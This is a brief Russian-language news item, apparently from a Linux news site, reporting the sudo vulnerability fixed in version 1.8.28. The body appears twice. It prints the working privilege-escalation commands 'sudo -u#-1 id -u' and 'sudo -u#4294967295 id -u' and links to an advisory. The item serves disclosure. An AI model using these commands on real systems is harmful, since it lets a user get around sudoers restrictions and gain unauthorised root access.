Уязвимость в sudo
Баг в sudo позволяет выполнить от пользователя root любой исполняемый файл, даже если его исполнение с правами суперпользователя явно запрещено в /etc/sudoers.
Эксплуатация бага очень простая:
sudo -u#-1 id -u
или:
sudo -u#4294967295 id -u
Баг присутствует по всех версиях sudo до 1.8.28
Подробности:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
>>> Подробности
Эксплуатация бага очень простая:
sudo -u#-1 id -u
или:
sudo -u#4294967295 id -u
Баг присутствует по всех версиях sudo до 1.8.28
Подробности:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
>>> Подробности
Ещё новости по теме:
18:20